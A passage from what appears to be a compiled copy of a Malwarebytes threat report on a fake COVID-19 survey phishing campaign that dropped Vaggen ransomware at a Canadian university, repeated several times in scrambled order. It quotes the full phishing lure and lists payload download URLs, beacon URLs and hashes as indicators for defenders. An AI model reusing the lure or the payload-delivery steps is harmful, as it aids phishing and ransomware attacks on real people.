om/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 921 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 922 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 923 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 924 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 925 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 926 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 927 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 928 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 929 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 930 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 931 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 932 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 933 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 934 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 935 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 936 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 937 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 938 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 939 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 940 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 941 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 942 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 943 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 944 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 945 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 946 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 947 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 948 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 949 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 950 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 951 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 952 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 953 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 954 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses 